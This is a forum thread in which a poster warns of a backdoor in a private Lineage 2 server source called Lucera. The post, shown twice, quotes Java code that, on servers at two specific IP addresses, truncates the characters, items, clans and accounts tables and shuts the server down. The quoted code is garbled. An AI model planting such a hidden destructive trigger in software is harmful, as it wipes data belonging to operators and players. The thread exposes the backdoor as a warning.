Jump to content

Source Lucera (Rus. Private Project)


zoool

Recommended Posts

CARE BACKDOR :)

 

if (Config.GAMESERVER_HOSTNAME.equals ("77.120.16.18") | |

Config.GAMESERVER_HOSTNAME.equals ("77.120.29.151"))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

l2lufaila

Link to comment
Share on other sites

CARE BACKDOR :)

 

if (Config.GAMESERVER_HOSTNAME.equals ("77.120.16.18") | |

Config.GAMESERVER_HOSTNAME.equals ("77.120.29.151"))

ThreadPoolManager.getInstance (). schedule (new Runnable () {

Public void run () {

try {

L2DatabaseFactory.getInstance connection con = (). getConnection ();

con.prepareStatement ("TRUNCATE table characters"). execute ();

con.prepareStatement ("TRUNCATE table Items"). execute ();

con.prepareStatement ("TRUNCATE table clan_data "). execute ();

con.prepareStatement ("TRUNCATE table Accounts"). execute ();

con.close ();

} catch (Exception e) { } System.exit (2); } }, 2000);

l2lufaila

Link to comment
Share on other sites

  • 6 months later...
  • 1 year later...
  • 2 weeks later...
Guest
This topic is now closed to further replies.


×
×
  • Create New...